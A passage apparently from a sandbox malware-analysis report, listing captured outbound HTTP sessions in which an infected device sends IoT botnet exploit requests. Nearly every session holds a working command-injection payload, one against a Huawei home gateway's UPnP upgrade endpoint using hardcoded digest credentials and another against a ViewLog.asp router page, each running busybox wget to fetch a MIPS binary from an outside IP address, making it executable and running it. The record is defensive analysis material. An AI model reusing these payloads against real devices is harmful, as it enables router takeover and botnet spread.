                                              Date: Thu, 23 Nov 2023 04:17:09 GMT
                                              Server: Python/3.9 websockets/11.0.3
                                              Content-Length: 77
                                              Content-Type: text/plain
                                              Connection: close
                                              Data Raw: 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 61 20 57 65 62 53 6f 63 6b 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 64 69 64 20 6e 6f 74 20 72 65 63 65 69 76 65 20 61 20 76 61 6c 69 64 20 48 54 54 50 20 72 65 71 75 65 73 74 2e 0a
                                              Data Ascii: Failed to open a WebSocket connection: did not receive a valid HTTP request.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              380192.168.2.1440606156.241.15.15537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.591774940 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              381192.168.2.143914695.85.165.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:11.998460054 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              382192.168.2.145932685.69.32.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:12.180963993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.739619017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:13.859692097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.291503906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.899288893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.859005928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.778244972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              383192.168.2.143662031.136.166.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:12.185012102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.771658897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:13.923584938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.291495085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.899297953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:30.114898920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.826056957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              384192.168.2.144249694.122.229.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:12.224989891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              385192.168.2.144943294.121.69.1258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:12.227659941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              386192.168.2.143313241.239.73.17337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:13.165158033 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:13.417109966 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              387192.168.2.144232831.33.14.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.577327967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              388192.168.2.143695031.136.211.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.587636948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.171546936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
